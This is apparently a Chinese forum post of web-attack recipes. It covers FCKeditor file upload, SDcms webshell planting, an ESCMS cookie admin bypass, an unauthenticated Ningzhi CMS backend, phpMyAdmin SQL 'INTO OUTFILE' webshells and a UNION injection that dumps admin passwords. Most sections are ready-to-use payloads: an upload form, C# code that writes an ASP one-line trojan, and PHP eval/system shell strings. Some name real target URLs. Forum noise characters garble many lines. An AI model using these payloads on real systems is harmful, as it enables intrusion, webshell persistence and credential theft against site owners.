http://xxoo.com/controls/fckedit ... aspx/connector.aspx1 a) D2 v; ?2 M
跳转到网站根目录上传任意文件。" n! `% N/ \% X/ @0 E
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件8 n6 P: l) @& ^* v O
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">8 G: r8 r! z$ D. K8 P
Upload a new file:<br>- p2 D7 G1 k3 m1 a
<input type="file" name="NewFile" size="50"><br>
/ ^0 b- l) o* a- l<input id="btnUpload" type="submit" value="Upload">' G3 z* c1 {& O2 p4 |8 f2 f. O
</form>
: d! t6 b! D9 n, F# ~-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------& D \" z- @* g; J" U
$ G( z; b+ X3 f! k5 R# c) ~SDcms 后台拿webshell% o5 N) p/ p4 p x3 J
: M8 e, _4 ~% S" t6 e) h6 k( y
第一种方法:
" W$ F# t4 q2 p% X进入后台-->系统管理-->系统设置-->系统设置->网站名称;
+ d/ ?; A8 F2 p; l* f把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
" J7 j$ k& [( N用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
. F! e, b( p6 K7 M& y" k% o' |第二种方法:
' V0 {% o6 k G4 S9 B进入后台-->系统管理-->系统设置-->系统设置->上传设置;1 I1 j, A/ Z0 N7 g* r
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
# p7 X, N) n$ J+ ~) U第三种方法:
, F4 X# Q, r. a7 K: o# P/ D进入后台-->界面管理-->模板文件管理-->创建文件
2 d2 \! X2 }2 H文件名写入getshell.ashx( J* a0 r" E" t, t8 e- \
内容写入下面内容:
, A: Z& H1 m* t, l y/====================复制下面的=========================/6 m: ?% T0 b' V3 X
<%@ WebHandler Language="C#" Class="Handler" %>) A Z G( D b$ V1 m5 F+ N+ h
using System;
' l0 o N" R: s1 {/ T& a Y0 |! A& ^using System.Web;5 @2 X& [$ e, P N e1 F
using System.IO;
5 H% @# @* n& f9 u6 Q' Qpublic class Handler : IHttpHandler {
5 L5 ~. J4 `8 c3 m& R! Rpublic void ProcessRequest (HttpContext context) {8 a' q& b) c- b. y
context.Response.ContentType = "text/plain";
, x O, C, @1 E4 W" s) u8 t/ IStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));. [2 t1 u, b/ h6 A8 y a/ f
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
% b" E. f b4 X; E, A& H" ?file1.Flush();" F X) k% _9 J k; k q
file1.Close();
9 B* }' s3 y& S1 h}
1 ?8 d3 t& @1 g; Wpublic bool IsReusable {
3 J. [* _' p. Fget {
& g2 q' O! k. B- c: p, Breturn false;) Y. ?, o7 h6 @
}
# o5 o. B, p! V- F! ^: k0 q}, x6 k: ?3 \/ c
}
3 e3 x7 n7 P5 K, B/=============================================/
: a1 D5 k. A$ {+ P0 `访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx# W- a4 R7 f8 o; R: h. F* l
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
( I3 X: _8 a9 y, B-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* p% T4 u9 R( b" t Q* d& q7 |, w: }& g4 g# @, P% C
ESCMS网站管理系统0day
% P+ \$ {1 G2 }/ Z9 y. T1 m, C: m( u4 k1 I
后台登陆验证是通过admin/check.asp实现的. |: s. I: S$ V) y& a4 Y' u: Q9 g
F5 m! {7 X7 F8 d; D, f首先我们打开http://target.com/admin/es_index.html
, l2 t# Q/ S# P) S5 s0 a9 |4 v然后在COOKIE结尾加上
9 [8 D' K2 @! a _2 r- j; ESCMS$_SP2=ES_admin=st0p;. b( R0 g" L* ~; c
修改,然后刷新3 p" C, q9 u! L* [9 A* J% o: Y
进后台了嘎..
0 M$ ~3 r, Q7 g6 H8 L9 i2 {然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
' a( T! f G) N! a# G9 S: V/ Y1 I
; a( z% S" V8 T( H$ n( }利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
5 I x0 j, V+ a2 e$ F3 Z% v6 ^7 ~嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
1 s* {: ~5 N. |存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..5 S& s0 `& T# d0 W; H
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
O8 M+ m6 _. s9 V% P$ Z/ x------------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 G' s/ v; X( v" A% k# C
- D6 y5 ?$ s& n, o3 e* Z6 d宁志网站管理系统后台无验证漏洞及修复
5 ]8 Q% x0 D2 r" L8 J4 C# J8 R3 W0 Q3 E
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
9 R3 S, C( s; B0 `# s6 d官方网站:www.ningzhi.net) t- B: Z4 Q/ F$ J3 H9 A
学校网站管理系统 V.2011版本
9 |- n8 l5 l( F0 vhttp://down.chinaz.com/soft/29943.htm # d, t+ S9 H2 Q; s( ]
其它版本(如:政府版等),自行下载.: p9 i( J' c3 k
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~8 B$ ?0 R# h A1 r I# q
login.asp代码如下:
4 d% D0 J6 T0 M- T<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> " Q% G! M: o1 Q6 x0 l3 H
manage.asp代码我就不帖出来了.反正也没验证.
# l, B7 E) p$ }" h只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!( p3 G- p' i) d1 e' w2 m2 T
漏洞利用:0 M0 U/ v5 ^4 e. }0 ^
直接访问http://www.0855.tv/admin/manage.asp
. N9 z0 H6 T$ h3 U2 h数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5& }+ [- ?) Z4 N* ?6 Q
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# ~: A( e5 U7 H
0 V+ h' e0 l/ ^; c1 \( Q+ Lphpmyadmin拿shell的四种方法总结及修复/ `' M# r' p, y9 ?
5 `; b& B+ I, i' o3 `; {. Z; E% s方法一:# ]6 }- P+ n5 ?) m5 \* ~8 e, n( |
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );* u* w9 S* y9 M$ j& l
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');) ]9 T' ]' _# m9 y7 {5 C% ^3 ^
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
! f; h2 f# q: f, X----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
F. S: d7 A, v. Q, J7 p, O: T J 一句话连接密码:7on
& x2 n- n' P- F方法二:
0 G" Y0 o. h; e6 f读取文件内容: select load_file('E:/xamp/www/s.php');
' k# ~; ]% ~0 o Z5 a+ \写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
. k5 _1 O" w7 ]cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'$ w7 C2 y0 A/ D' u
方法三:2 K6 N5 v/ _ H* y- t
JhackJ版本 PHPmyadmin拿shell) F: l) E% e+ |: h
Create TABLE study (cmd text NOT NULL);
- L; ~; J6 b9 b* dInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');: W! i& g9 ~' K' C: ^" g \$ |
select cmd from study into outfile 'E:/wamp/www/7.php';
9 `8 I/ k# z* |8 ^1 I$ {0 bDrop TABLE IF EXISTS study;% b: W! }$ B& [1 L$ z. k+ F
<?php eval($_POST[cmd])?>+ O: n% U8 F% I
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。# j: l% t! g- _
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 18 z; N: B' F* A# y+ u
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1. X7 K! Q6 z4 Z$ ~) E2 w4 Q
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
- ~* t9 r k0 \, i/ P1 N方法四:$ V+ y5 ~9 H9 D7 ~+ o( y
select load_file('E:/xamp/www/study.php');
( P$ u# z, q( wselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
5 n9 q& T7 ]9 K( \4 v7 l! a4 C然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
6 P8 |1 W; h* p-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 R/ x) x8 m" i3 E6 t. H" E' H; M5 Q) w
NO.001中学网站管理系统 Build 110628 注入漏洞, g4 X: l7 y) n* {- h) n
) o# }& f" ~5 y& V% Y1 u ONO.001中学网站管理系统功能模块:7 \+ z3 P8 c: y) r% i6 _* k
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
+ Z$ P5 p' a$ {' j6 D- r2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
+ x: u: F% m) x3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
+ n3 ` H. [2 K f6 b; }4.视频图片管理:一级分类,动态添加视频或者图片等信息: j1 t/ J% i9 O. l, A1 V
5.留言管理:对留言,修改,删除、回复等管理
0 V3 C4 J: P" E6.校友频道:包括校友资料excel导出、管理等功能& t8 F R6 }8 v1 j. j
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页5 n+ n2 p* V9 t, N$ K! A; J+ T
默认后台:admin/login.asp! z; W) I1 Y' v( Q- ^' l
官方演示:http://demo.001cms.net- N) t, v* T D1 @4 \* _/ a1 q- }
源码下载地址:http://down.chinaz.com/soft/30187.htm
4 n: C0 y( A% B5 ?5 mEXP:6 h4 O) z2 F; I) l" s1 g
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin- s7 j) i- _: j5 c/ H7 h
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin( ]0 k: t9 T. @4 k. |3 q( K
getshell:后台有备份,你懂的
3 P: v* x+ `; a另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
+ k1 v4 ^- r( G4 @1 E% R------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |